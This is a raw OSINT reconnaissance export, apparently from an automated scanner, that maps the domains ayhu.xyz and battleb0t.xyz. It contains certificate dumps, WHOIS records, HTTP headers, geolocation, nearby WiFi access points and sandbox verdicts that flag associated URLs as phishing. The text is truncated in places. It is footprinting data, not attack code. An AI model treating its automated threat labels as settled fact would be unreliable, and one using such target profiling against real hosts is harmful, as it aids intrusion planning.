1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
56:a7:32:cc:63:2f:7b:45:7f:05:18:5f:3e:03:67:82:e5:0e:
14:24:2d:4e:bd:24:f5:fa:90:92:69:17:7b:d1:23:b4:5f:72:
7a:af:32:e2:c8:28:7e:98:41:f2:c7:ab:41:34:02:6f:ca:a4:
77:0e:6b:df:35:1b:69:e8:30:42:43:a2:b1:d9:fd:cb:17:1e:
46:a3:67:c9:5d:ff:94:85:0e:a2:df:d3:83:d0:a3:f2:83:7b:
dd:2e:d5:ae:32:94:05:46:0c:19:ca:ed:27:24:30:de:c1:83:
b3:fa:a9:28:10:06:41:f9:bc:8e:ec:2c:b2:c5:50:1b:53:d4:
5f:dc:93:4c:91:47:36:3e:18:bb:60:2e:2b:c3:a2:8e:d0:41:
bf:b5:f2:c1:3c:9e:23:83:f3:0a:e9:90:b8:ea:07:4c:7d:33:
7f:96:41:8c:3e:17:1d:9e:ed:d7:88:e1:f2:d6:4c:ee:67:b7:
9d:77:dd:54:17:a0:45:80:3c:14:ae:d9:2c:f9:2f:a7:d3:1a:
b6:ff:c0:51:b2:15:42:38:03:d0:4b:ff:c0:3f:6d:02:65:07:
67:bb:0a:98:60:da:ab:a9:72:b1:8d:b2:e0:ad:99:f8:08:b9:
1a:39:e6:69:82:23:94:db:8e:23:77:72:cb:aa:45:70:fd:4e:
10:ce:72:06
| ayhu.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MarvellAP8x (Net ID: 00:01:36:16:7E:FB) | 37.780462,-122.390564 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.175): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:8443 | 188.114.96.0/24 |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 0 | 0 | 3 | 0 | None | 165.232.113.76 | 165.232.113.85 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.70): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:12 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:54:13 | Linked URL - External | No | Web Spider | 0 | 0 | 2 | 0 | None | https://www.discord.com | https://battleb0t.xyz/ |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.30): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | giters (Category: coding)
https://giters.com/ayhu | ayhu |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@west.cn | Domain Name: AYU.XYZ
Registry Domain ID: D9607467-CNIC
Registrar WHOIS Server: whois.west.cn
Registrar URL: http://www.west.cn
Updated Date: 2023-02-11T09:04:01.0Z
Creation Date: 2015-08-20T20:34:37.0Z
Registry Expiry Date: 2023-08-20T23:59:59.0Z
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Registrar IANA ID: 1556
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: Jiang Su
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS5.MYHOSTADMIN.NET
Name Server: NS6.MYHOSTADMIN.NET
Name Server: NS1.MYHOSTADMIN.NET
Name Server: NS2.MYHOSTADMIN.NET
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@west.cn
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayu.xyz
Registry Domain ID: xy74494296952501
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2015-08-20T20:34:39.0Z
Creation Date: 2015-08-20T20:34:39.0Z
Registrar Registration Expiration Date: 2023-08-20T20:34:39.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Jiang Su
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Name Server: ns1.myhostadmin.net
Name Server: ns2.myhostadmin.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: westabuse@gmail.com
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
|
| 2023-05-12 02:45:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 50, u'search_terms': [{u'id': u'host', u'value': u'185.199.111.153'}], u'result': [{u'environment_id': 110, u'job_id': u'645c5c80cefc7dcf210b99d0', u'analysis_start_time': u'2023-05-11 03:09:53', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'74e362294f1a7a74dccf47210346068375f818d951a223186b4bbef05e309da1', u'type': None, u'type_short': u'url', u'size': 59}, {u'environment_id': 100, u'job_id': u'645b8370d7b98701230dc5fe', u'analysis_start_time': u'2023-05-10 11:43:44', u'vx_family': u'Phishing site', u'av_detect': u'36', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'ac895efa3a08b3b81e71026cac1be65be304d90b60e361b7036fe584b66ed688', u'type': None, u'type_short': u'url', u'size': 81}, {u'environment_id': 110, u'job_id': u'645ae1eaa7eade680c0e57b4', u'analysis_start_time': u'2023-05-10 00:14:34', u'vx_family': u'Phishing site', u'av_detect': u'59', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'08f60cb3d98136e067f2bfa99af19bbad336b8e418b47bda5a8f076a28abe012', u'type': None, u'type_short': u'url', u'size': 72}, {u'environment_id': 100, u'job_id': u'645a6cd90dbdcffebe0c4993', u'analysis_start_time': u'2023-05-09 15:55:05', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'dd275a78c386fc8f6b453e8b7fd3bd051877cabadfdedff2620dca5c655c625b', u'type': None, u'type_short': u'url', u'size': 63}, {u'environment_id': 160, u'job_id': u'645985a2d5bf2769970d369c', u'analysis_start_time': u'2023-05-08 23:28:34', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'27625e24647d2569a674e3799d36a2008f93eb351cf7cc3ffd05fe808ed74b1c', u'type': None, u'type_short': u'url', u'size': 54}, {u'environment_id': 160, u'job_id': u'645556072511fcf1570c8679', u'analysis_start_time': u'2023-05-05 19:16:24', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'96f77f0dbdde7c273c6097c174213d38813ce2849f4a226fddaf8ae4ca121567', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 110, u'job_id': u'645082f9c5df89a1700be06c', u'analysis_start_time': u'2023-05-02 03:26:49', u'vx_family': u'Phishing site', u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'33e6aee38e124479e80a03f00d38f1f93137511fafd55c0815b25d2f8b295467', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 110, u'job_id': u'645080e068df2a2930023159', u'analysis_start_time': u'2023-05-02 03:17:52', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'b48273996518b805b066210f156613b2f4e1bde5d72b4ddef5d8fb19dffca841', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 160, u'job_id': u'644fe86e52348161b10d0bbd', u'analysis_start_time': u'2023-05-01 16:27:26', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 17, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'020e3e2c8da24f85e4346b589068e6dcfd2e4afeeada816b7f41fb16dedf3864', u'type': None, u'type_short': u'url', u'size': 137}, {u'environment_id': 110, u'job_id': u'644da9a48a42e7a8ac0ab07b', u'analysis_start_time': u'2023-04-29 23:35:01', u'vx_family': u'Phishing site', u'av_detect': u'73', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'55f21248b94bc741247d69ef0f5523011eacc847a3c72e4066c45708f38bb7f4', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 100, u'job_id': u'643e6bb1ce8926036a0612d7', u'analysis_start_time': u'2023-04-18 10:06:41', u'vx_family': u'Malicious site', u'av_detect': u'32', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'b5986141b47c3c37930d2f7ecc1e1d9f2da6d75a10d246c12433b5d577d5022d', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 160, u'job_id': u'643d8a8c389bae426c02954d', u'analysis_start_time': u'2023-04-17 18:06:05', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8b21d884c9a557260a5aea41f401867fe493f9f5ebb98ed736c4b3b93bb0cc24', u'type': None, u'type_short': u'url', u'size': 42}, {u'environment_id': 100, u'job_id': u'643ad8c2d9954faf0e0cbe38', u'analysis_start_time': u'2023-04-15 17:02:58', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'6fb52fd233065ac1b93e470d857f64d82a2ccffef8335fcaa02bc58df2ca970c', u'type': None, u'type_short': u'url', u'size': 61}, {u'environment_id': 100, u'job_id': u'6439070c265a4fa83a00eb7c', u'analysis_start_time': u'2023-04-14 07:55:56', u'vx_family': u'Phishing site', u'av_detect': u'33', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'a345bbe691e1659f35836f52c8e9962f1c963cb45ca1b0cde2d8b2fb52e5544d', u'type': None, u'type_short': u'url', u'size': 129}, {u'environment_id': 100, u'job_id': u'643580c0a81f95183f013251', u'analysis_start_time': u'2023-04-11 15:46:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'a66876bf5d88b6b1e4cae2ad5fe213c6a5ae169ab90a58bae2c559a81f71043e', u'type': None, u'type_short': u'url', u'size': 51}, {u'environment_id': 100, u'job_id': u'642d600430a7625af306f95c', u'analysis_start_time': u'2023-04-05 11:48:20', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'3d712467533d99dd99de9bab56da009d5317f2d14234f7657c15944b5d818010', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 100, u'job_id': u'642cbf3a104a26f5700ba80c', u'analysis_start_time': u'2023-04-05 00:22:18', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'ebc2aa1a212b05483a1bcd945eba0ca46d86c27ab52985919458956cbd48fde6', u'type': None, u'type_short': u'url', u'size': 95}, {u'environment_id': 160, u'job_id': u'642c94d30769d9c0a40c4106', u'analysis_start_time': u'2023-04-04 21:21:23', u'vx_family': None, u'av_detect': u'10', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'e0744649b033b964db2e366b6ff845e7fe07914dc74b5277a0d3b161ff36da82', u'type': None, u'type_short': u'url', u'size': 63}, {u'environment_id': 160, u'job_id': u'642687dd7efd48c1e70ae62a', u'analysis_start_time': u'2023-03-31 07:12:29', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'2ab04053e6d52deab2748242f4153415e9979cb97b0e3eb54a049b1df509056c', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 160, u'job_id': u'6423e52a9b014c00df02b473', u'analysis_start_time': u'2023-03-29 07:18:25', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f29376302ee518c13e0e840829c33da3b9baae9c8efaf8eb954004b8c681fae8', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 160, u'job_id': u'64226311d0c96e57900e7b36', u'analysis_start_time': u'2023-03-28 03:46:25', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'ab47283e64d965e888dbbff352d5255a05303978f2a9ada78c003c7c0e765a47', u'type': None, u'type_short': u'url', u'size': 59}, {u'environment_id': 160, u'job_id': u'641f9e15db06093884029e45', u'analysis_start_time': u'2023-03-26 01:21:26', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 85, u'verdict': u'malicious', u'submit_name': u'rufus-3.22.exe', u'sha256': u'ac2a1743bbfc19268c36280b50a003366d41854863d4808099cd87f77fa5f433', u'type': None, u'type_short': u'exe', u'size': 1419336}, {u'environment_id': 100, u'job_id': u'641dadee645a17634f0da09c', u'analysis_start_time': u'2023-03-24 14:04:31', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'b6b5ebd305b3343ac77a7ced0bf7c27fc072b3166da85d34559ceafdff465cbc', u'type': None, u'type_short': u'url', u'size': 1108}, {u'environment_id': 100, u'job_id': u'641c9437020019db9909aba8', u'analysis_start_time': u'2023-03-23 18:02:32', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'3ab0f4618a12894b7fef72dd | 185.199.111.153 |
| 2023-05-12 02:45:09 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'104.21.6.166', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 104.21.6.166 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.162): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 1 | 0 | None | http://kekw.battleb0t.xyz/jar | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:C4:0E:35) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:23 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.109.153:443 | 185.199.109.153 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:30:4A:F9) | 40.2024, 29.0398 |
| 2023-05-12 02:56:55 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | tiktok.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 29 13:55:16 2022 GMT
Not After : Mar 29 13:55:15 2023 GMT
Subject: CN=tiktok.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:tiktok.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:48:04:ac:20:99:db:ca:ca:6a:cc:70:e1:43:3e:81:e0:75:
d7:27:b2:3e:bf:0a:2c:b9:85:20:f8:d1:95:d7:8e:f6:e5:e7:
34:bf:dd:34:59:cd:80:f7:bc:54:a0:98:88:5b:c3:c9:31:8c:
d5:fb:f3:f4:99:19:e3:f7:7b:0e:cf:b8:fd:2e:98:1e:df:5e:
bd:32:3e:95:6e:85:fd:3c:39:51:1e:b7:ca:45:bb:af:6c:d9:
7d:bb:b2:5a:16:0a:ba:b6:2c:18:38:cf:10:14:91:d1:4e:1e:
9e:4a:61:8d:0a:4f:5a:cd:71:50:15:21:8b:cd:1e:13:69:3b:
32:8b:47:84:8b:ff:c8:9a:db:3a:ad:fc:8a:2a:31:1f:ec:36:
13:1f:de:24:59:1f:25:65:d4:e8:c7:48:dd:a5:f3:44:51:45:
44:37:47:80:9f:8c:0d:17:6e:d2:9a:8a:53:98:c4:b7:c5:92:
92:58:25:fc:e6:3b:4e:df:03:44:8a:de:9f:fe:7a:58:8e:b2:
30:ab:13:3d:69:81:47:99:7f:37:6f:80:60:8a:d3:9e:ba:df:
ab:68:1e:a3:61:1c:dd:77:2a:1c:ae:ee:b6:17:f1:05:72:d2:
ee:bb:6e:b1:5f:2b:66:a2:ce:5c:75:86:24:dc:66:4d:87:3e:
95:cd:4d:fe
|
| 2023-05-12 02:58:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | {u'count': 27, u'search_terms': [{u'id': u'host', u'value': u'34.74.170.74'}], u'result': [{u'environment_id': 100, u'job_id': u'63a3b3d1ddf29718d50a1530', u'analysis_start_time': u'2022-12-22 01:39:24', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'ee7e2d9cc60e02d86b4be3ce61368afcd366ceb3c836b41944262d1f1c35717d', u'type': None, u'type_short': u'url', u'size': 70}, {u'environment_id': 160, u'job_id': u'63977e9dae1f9c003b5ce605', u'analysis_start_time': u'2022-12-12 19:18:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'cc115afccd6fc96e7e94198d40bec095c6c73abe4941265f2c727cc456fe7812', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 100, u'job_id': u'6392828d79488730c200349a', u'analysis_start_time': u'2022-12-09 00:34:22', u'vx_family': None, u'av_detect': u'100', u'environment_description': u'Windows 7 32 bit', u'threat_score': 0, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'0642b9057180c8b374ff898f17d356189d3b264a9632064dbb077777fcceccaa', u'type': None, u'type_short': u'url', u'size': 111}, {u'environment_id': 120, u'job_id': u'638f679fb1d2070160672c24', u'analysis_start_time': u'2022-12-06 16:02:39', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 